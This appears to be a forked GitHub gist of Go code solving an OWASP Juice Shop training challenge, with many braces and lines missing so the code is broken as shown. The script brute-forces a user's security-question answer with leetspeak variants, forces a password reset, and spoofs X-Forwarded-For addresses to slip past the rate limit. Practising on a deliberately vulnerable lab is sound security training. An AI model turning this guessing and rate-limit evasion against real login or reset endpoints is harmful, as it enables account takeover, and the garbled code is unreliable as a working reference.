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Forked from cimi/juice_shop_morty.go
Created October 28, 2019 13:26
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Solution for OWASP Juice Shop challenge
package main
import (
// Solution for OWASP Juice Shop challenge
// 'Reset Morty's password via the Forgot Password mechanism with his obfuscated answer to his security question.'
const seed = "snowball" // "snuffles"
func main() {
g := newGuesser(seed)
c := newChecker(&http.Client{})
attempts := 0
for guess := g.get(); guess != ""; guess = g.get() {
ok := c.send(guess)
if ok {
fmt.Printf("\nSuccess! %s", guess)
fmt.Printf("\r%s Attempt: %d", guess, attempts)
type checker struct {
fakeIP string
client *http.Client
func newChecker(client *http.Client) *checker {
return &checker{
fakeIP: "",
client: client,
func (c *checker) send(guess string) bool {
url := "http://localhost:3000/rest/user/reset-password"
jsonStr := fmt.Sprintf(`{"email":"[email protected]","answer":"%s","new":"pwned","repeat":"pwned"}`, guess)
req, _ := http.NewRequest("POST", url, bytes.NewBuffer([]byte(jsonStr)))
req.Header.Add("Content-Type", `application/json`)
req.Header.Add("X-User-Email", `[email protected]`)
req.Header.Add("X-Forwarded-For", c.fakeIP)
resp, _ := c.client.Do(req)
body, _ := ioutil.ReadAll(resp.Body)
attempts, _ := strconv.Atoi(resp.Header["X-Ratelimit-Remaining"][0])
if attempts < 5 {
c.fakeIP = c.newIP()
return string(body) != "Wrong answer to security question."
func (c *checker) newIP() string {
parts := strings.Split(c.fakeIP, ".")
final, _ := strconv.Atoi(parts[3])
if final > 254 {
panic("no more ips")
parts[3] = strconv.Itoa(final + 1)
return strings.Join(parts, ".")
var subs = map[rune]rune{
'a': '4',
'b': '8',
'e': '3',
'l': '1',
'o': '0',
's': '5',
't': '7',
'z': '2',
type guesser struct {
seed string
variants []string
idx int
func newGuesser(seed string) *guesser {
l := &guesser{
seed: strings.ToLower(seed),
return l
func (g *guesser) generate() {
var gen func(s string, idx int) []string
gen = func(s string, idx int) []string {
if idx == len(s) {
return []string{s}
r := []rune(s)
c := []rune{unicode.ToUpper(r[idx])}
if sub, ok := subs[r[idx]]; ok {
c = append(c, sub)
result := gen(s, idx+1)
for _, sub := range c {
r[idx] = sub
result = append(result, gen(string(r), idx+1)...)
return result
g.variants = gen(g.seed, 0)
func (g *guesser) get() string {
if g.idx < len(g.variants) {
res := g.variants[g.idx]
g.idx += 1
return res
return ""
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